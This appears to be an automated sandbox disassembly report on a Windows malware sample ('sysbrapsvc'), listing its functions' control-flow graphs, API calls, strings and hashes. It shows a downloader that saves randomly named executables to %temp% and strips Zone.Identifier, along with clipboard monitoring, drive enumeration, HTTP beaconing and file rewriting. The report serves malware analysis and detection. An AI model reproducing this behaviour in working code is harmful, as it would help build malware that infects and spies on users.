                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 40b350-40b367 call 40b280 493 40b369 490->493 494 40b36e-40b38a call 40aed0 strcmp 490->494 495 40b5f5-40b5f8 493->495 498 40b391-40b3ad call 40aed0 strstr 494->498 499 40b38c 494->499 502 40b3f0-40b40c call 40aed0 strstr 498->502 503 40b3af-40b3cb call 40aed0 strstr 498->503 499->495 510 40b40e-40b42a call 40aed0 strstr 502->510 511 40b44f-40b46b call 40aed0 strstr 502->511 508 40b3eb 503->508 509 40b3cd-40b3e9 call 40aed0 strstr 503->509 508->495 509->502 509->508 520 40b44a 510->520 521 40b42c-40b448 call 40aed0 strstr 510->521 518 40b46d-40b489 call 40aed0 strstr 511->518 519 40b4ae-40b4c4 EnterCriticalSection 511->519 532 40b4a9 518->532 533 40b48b-40b4a7 call 40aed0 strstr 518->533 523 40b4cf-40b4d8 519->523 520->495 521->511 521->520 527 40b509-40b514 call 40b600 523->527 528 40b4da-40b4ea 523->528 539 40b5ea-40b5ef LeaveCriticalSection 527->539 540 40b51a-40b528 527->540 529 40b507 528->529 530 40b4ec-40b505 call 40d950 528->530 529->523 530->527 532->495 533->519 533->532 539->495 542 40b52a 540->542 543 40b52e-40b53f call 40a240 540->543 542->543 543->539 546 40b545-40b562 call 40d950 543->546 549 40b564-40b574 546->549 550 40b5ba-40b5d2 546->550 551 40b580-40b5b8 call 40a660 549->551 552 40b576-40b57e Sleep 549->552 553 40b5d8-40b5e3 call 40b600 550->553 551->553 552->549 553->539 558 40b5e5 call 40b030 553->558 558->539
                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 560 401920-401947 GetTickCount WaitForSingleObject 561 401ac9-401acf 560->561 562 40194d-401964 WSAWaitForMultipleEvents 560->562 563 4019f0-401a03 GetTickCount 562->563 564 40196a-401981 WSAEnumNetworkEvents 562->564 565 401a43-401a4c GetTickCount 563->565 566 401a05-401a14 EnterCriticalSection 563->566 564->563 567 401983-401988 564->567 571 401ab5-401ac3 WaitForSingleObject 565->571 572 401a4e-401a5d EnterCriticalSection 565->572 568 401a16-401a1d 566->568 569 401a3a-401a41 LeaveCriticalSection 566->569 567->563 570 40198a-401990 567->570 573 401a35 call 401820 568->573 574 401a1f-401a27 568->574 569->571 570->563 575 401992-4019b1 accept 570->575 571->561 571->562 576 401aa1-401ab1 LeaveCriticalSection GetTickCount 572->576 577 401a5f-401a77 InterlockedExchangeAdd call 40d950 572->577 573->569 574->568 578 401a29-401a30 LeaveCriticalSection 574->578 575->563 580 4019b3-4019c2 call 4022c0 575->580 576->571 584 401a97-401a9f 577->584 585 401a79-401a82 577->585 578->571 580->563 588 4019c4-4019df call 401740 580->588 584->576 584->577 585->584 587 401a84-401a8d call 40aff0 585->587 587->584 588->563 593 4019e1-4019e7 588->593 593->563 594 4019e9-4019eb call 401cf0 593->594 594->563
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 613 405910-405932 GetWindowLongW 614 405934-40593b 613->614 615 405956-40595d 613->615 616 405941-405945 614->616 617 4059c7-4059d8 IsClipboardFormatAvailable 614->617 618 405986-40598c 615->618 619 40595f 615->619 624 405964-405981 SetClipboardViewer SetWindowLongW 616->624 625 405947-40594b 616->625 622 4059e3-4059ed IsClipboardFormatAvailable 617->622 623 4059da-4059e1 617->623 620 4059a6-4059aa 618->620 621 40598e-4059a4 SetWindowLongW 618->621 626 405b44-405b5d DefWindowProcA 619->626 627 4059c2 620->627 628 4059ac-4059bc SendMessageA 620->628 621->627 630 4059f8-405a02 IsClipboardFormatAvailable 622->630 631 4059ef-4059f6 622->631 629 405a0b-405a0f 623->629 624->626 632 405951 625->632 633 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 625->633 627->626 628->627 635 405a15-405a1f OpenClipboard 629->635 636 405adf-405ae3 629->636 630->629 634 405a04 630->634 631->629 632->626 633->626 634->629 635->636 639 405a25-405a36 GetClipboardData 635->639 637 405ae5-405af5 SendMessageA 636->637 638 405afb 636->638 637->638 638->626 640 405a38 639->640 641 405a3d-405a4e GlobalLock 639->641 640->626 642 405a50 641->642 643 405a55-405a66 641->643 642->626 644 405a68-405a6c 643->644 645 405a89-405a9c call 405630 643->645 646 405a9e-405aae call 405750 644->646 647 405a6e-405a72 644->647 653 405ab1-405ac5 GlobalUnlock CloseClipboard 645->653 646->653 649 405a74 647->649 650 405a76-405a87 call 405510 647->650 649->653 650->653 653->636 657 405ac7-405adc call 4048a0 call 40a660 653->657 657->636
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 709 40e070-40e10b memset InternetCrackUrlA InternetOpenA 710 40e111-40e144 InternetConnectA 709->710 711 40e287-40e290 709->711 712 40e27a-40e281 InternetCloseHandle 710->712 713 40e14a-40e17a HttpOpenRequestA 710->713 712->711 714 40e180-40e197 HttpSendRequestA 713->714 715 40e26d-40e274 InternetCloseHandle 713->715 716 40e260-40e267 InternetCloseHandle 714->716 717 40e19d-40e1a1 714->717 715->712 716->715 718 40e256 717->718 719 40e1a7 717->719 718->716 720 40e1b1-40e1b8 719->720 721 40e249-40e254 720->721 722 40e1be-40e1e0 InternetReadFile 720->722 721->716 723 40e1e2-40e1e9 722->723 724 40e1eb 722->724 723->724 725 40e1ed-40e244 call 40a490 memcpy 723->725 724->721 725->720
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 749 40ec70-40ecaf CreateFileW 750 40ecb5-40ecd0 CreateFileMappingW 749->750 751 40edca-40edce 749->751 752 40edc0-40edc4 CloseHandle 750->752 753 40ecd6-40ecef MapViewOfFile 750->753 754 40edd0-40edf0 CreateFileW 751->754 755 40ee24-40ee2a 751->755 752->751 756 40ecf5-40ed0b GetFileSize 753->756 757 40edb6-40edba CloseHandle 753->757 758 40edf2-40ee12 WriteFile CloseHandle 754->758 759 40ee18-40ee21 call 40a660 754->759 760 40ed11-40ed24 call 40cca0 756->760 761 40edac-40edb0 UnmapViewOfFile 756->761 757->752 758->759 759->755 760->761 766 40ed2a-40ed39 760->766 761->757 766->761 767 40ed3b-40ed6a call 40c640 766->767 767->761 770 40ed6c-40ed97 call 40a990 memcmp 767->770 770->761 773 40ed99-40eda5 call 40a660 770->773 773->761
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
